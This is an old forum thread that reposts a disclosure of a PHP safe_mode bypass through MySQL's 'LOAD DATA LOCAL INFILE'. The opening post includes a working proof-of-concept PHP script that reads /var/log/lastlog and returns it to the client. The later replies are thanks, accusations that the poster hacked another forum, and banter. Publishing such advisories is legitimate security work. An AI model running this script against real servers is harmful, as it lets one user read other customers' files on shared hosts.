Go Back   Computer Forums > General Computing > Server Administration
Click Here to Login
Join Computer forums Today


Reply
 
Thread Tools Search this Thread Display Modes
 
Old 05-04-2003, 05:55 PM   #1
 
Join Date: May 2003
Posts: 56
Default Some PHP insight ...

PHP includes a commonly used feature known as Safe Mode ... When enabled.. scripts are very highly limited in their ability to access or execute local files.. among other things ... PHP relies on a wrapper function around all file system calls to perform access checks.. but unfortunately.. the bundled MySQL client library has not been modified to perform such checks on "LOAD DATA INFILE LOCAL" statements ...
If someone has access to a MySQL server (either provided by you or themself).. they can use it as a proxy by which to download files residing on the safe_mode-enabled web server ... For large ISPs relying on this feature for individual customer privacy.. it could mean clients accessing each other's files.. or viewing of files on an improperly secured server ...

Fix :

Currently none exists ... You may use other PHP safe_mode functions to disable the use of the MySQL client library.. or secure your servers in a proper fashion ... A suggested fix for the PHP developers might be to scan mysql_query()s for strings similar to "LOAD DATA LOCAL INFILE" ...

PHP Safe Mode Problem

The attached script will (once configured correctly) attempt to read "/var/log/lastlog" via the SQL daemon and return it to the client ...

$ cp safe_mode.php /www
$ wget -qO lastlog_via_mysql localhost/safe_mode.php
$ diff /var/log/lastlog lastlog_via_mysql; echo $?
0

This script will connect to a database server running locally or otherwise.. create a temporary table with one column, use the LOAD DATA statement to read a (possibly binary) file.. then reads it back to the client.

Any type of file may pass through this 'proxy'. Although unrelated, this may also be used to access files on the DB server (although they must be world-readable or in MySQLd's basedir.. according to docs)
*/


$host = 'localhost';
$user = 'root';
$pass = 'letmein';
$db = 'test_database';

$filename = '/var/log/lastlog'; /* File to grab from [local] server */
$local = true; /* Read from local filesystem */


$local = $local ? 'LOCAL' : '';

$sql = array (
"USE $db",

'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',

"LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS "
. "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
. "ESCAPED BY '' "
. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

"SELECT a FROM $tbl LIMIT 1"
);

Header ('Content-type: text/plain');

mysql_connect ($host, $user, $pass);

foreach ($sql as $statement) {
$q = mysql_query ($statement);

if ($q == false) die (
"FAILED: " . $statement . " " .
"REASON: " . mysql_error () . " "
);

if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;

echo $r [0];
mysql_free_result ($q);
}


Sincerely
CourtneyDS
__________________

CourtneyDS is offline   Reply With Quote
Old 05-04-2003, 06:21 PM   #2
Site Team
 
David Lindon's Avatar
 
Join Date: Dec 2002
Posts: 15,233
Default

Thank you for that. I will test my server.
__________________

__________________
[url=http://www.LNXPS.NET]LNXPS.NET - The XPS Library]
David Lindon is offline   Reply With Quote
Old 05-04-2003, 09:22 PM   #3
 
Join Date: May 2003
Posts: 56
Default

Hopefully that code will be of some assistance to you David ...

It was quite some time ago ( Maybe a month or so ) that I read something else but it concerned PHP / MySQL and Apache servers ...

The artical and code did draw my concern so I burnt it on CD-ROM ... I will see if I can find it.. it may or may not be of intrest to you ...

Sincerely
CourtneyDS
CourtneyDS is offline   Reply With Quote
Old 05-04-2003, 10:54 PM   #4
Solid State Member
 
Join Date: May 2003
Posts: 9
Default

CourtneyDS, are you not the person who hacked the LTI forum?
jasynder is offline   Reply With Quote
Old 05-05-2003, 11:27 AM   #5
Site Team
 
David Lindon's Avatar
 
Join Date: Dec 2002
Posts: 15,233
Default

Quote:
Originally posted by CourtneyDS
Hopefully that code will be of some assistance to you David ...

It was quite some time ago ( Maybe a month or so ) that I read something else but it concerned PHP / MySQL and Apache servers ...

The artical and code did draw my concern so I burnt it on CD-ROM ... I will see if I can find it.. it may or may not be of intrest to you ...

Sincerely
CourtneyDS
Thanks that would be helpful.
Quote:
CourtneyDS, are you not the person who hacked the LTI forum?
I think so or doesn't like eyelfix.
__________________
[url=http://www.LNXPS.NET]LNXPS.NET - The XPS Library]
David Lindon is offline   Reply With Quote
Old 05-12-2003, 05:58 PM   #6
 
Join Date: May 2003
Posts: 56
Default

jasnder :
Quote:
CourtneyDS, are you not the person who hacked the LTI forum?
Is there any need to crack something that gives you what you are looking for in three (3) simple querys.. ? ... ?

NONYA / Mohamed Tarek.. I would strongly advise reading alittle more indepth on PHP ... Being from Cario.. I am sure you have more advanced reading material

Eyelfixit / Rejean.. LMAO !

Sincerely
CourtneyDS
CourtneyDS is offline   Reply With Quote
Old 02-12-2004, 05:34 AM   #7
Daemon Poster
 
Novartic_'s Avatar
 
Join Date: Feb 2004
Posts: 838
Send a message via MSN to Novartic_ Send a message via Yahoo to Novartic_
Default Re: Some PHP insight ...

hum u have a problem husten. i can see wats roing with it but i am a busy person so i can help. post it on me site and ill help u.
__________________
HomeSite: www. n-computers.co.uk, SupportForum: forum. n-computers.co.uk
Processor:AMD XP2600+ 2.00GHz.
Memory:1.5GB HD:80Gb, 40GB.
Video:800 x 600 in64KColors.
O/S:Windows XP Pro SP2 CRACKED. PLEASE DO NOT CHANGE MY SIG, IT HAS BEEN THE SAME FOR 2 YEARS SO LEAVE IT.
Novartic_ is offline   Reply With Quote
Old 02-15-2004, 06:14 AM   #8
Guru
 
Lord Kalthorn's Avatar
 
Join Date: Dec 2003
Location: Britain
Posts: 13,293
Send a message via MSN to Lord Kalthorn
Default

Is it just me, or does Novartic get more and more annoying everytime he posts! If you can see something wrong with it; why don't you just tell us and be done with it! Without all of this Bureaucracy!
__________________
A Knight is sworn to Honour. His heart knows only Virtue. His blade defends the helpless. His might upholds the Weak. His word speaks only truth. His wrath undoes the Wicked.
Lord Kalthorn is offline   Reply With Quote
Old 02-25-2004, 06:09 AM   #9
Daemon Poster
 
Novartic_'s Avatar
 
Join Date: Feb 2004
Posts: 838
Send a message via MSN to Novartic_ Send a message via Yahoo to Novartic_
Default Re: Some PHP insight ...

hay dont u start. i cant help it if im dislexic.
__________________
HomeSite: www. n-computers.co.uk, SupportForum: forum. n-computers.co.uk
Processor:AMD XP2600+ 2.00GHz.
Memory:1.5GB HD:80Gb, 40GB.
Video:800 x 600 in64KColors.
O/S:Windows XP Pro SP2 CRACKED. PLEASE DO NOT CHANGE MY SIG, IT HAS BEEN THE SAME FOR 2 YEARS SO LEAVE IT.
Novartic_ is offline   Reply With Quote
Old 02-25-2004, 07:24 AM   #10
Guru
 
Lord Kalthorn's Avatar
 
Join Date: Dec 2003
Location: Britain
Posts: 13,293
Send a message via MSN to Lord Kalthorn
Default Re: Some PHP insight ...

Quote:
Originally Posted by novartic
hay dont u start. i cant help it if im dislexic.
You're not dislexic! You just don't type properly! Nah - I was just being silly about the you get more and mroe annoying. I have come to find your bad typing your most endearing quality - not a good sign but still.

Can't you just tell her here - it would be much easier - or has she already asked you at your; and I use the term as loosely as possible Website already?
__________________

__________________
A Knight is sworn to Honour. His heart knows only Virtue. His blade defends the helpless. His might upholds the Weak. His word speaks only truth. His wrath undoes the Wicked.
Lord Kalthorn is offline   Reply With Quote
Reply

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off



All times are GMT -5. The time now is 06:37 PM.


Powered by vBulletin® Version 3.8.8 Beta 4
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Search Engine Friendly URLs by vBSEO 3.6.0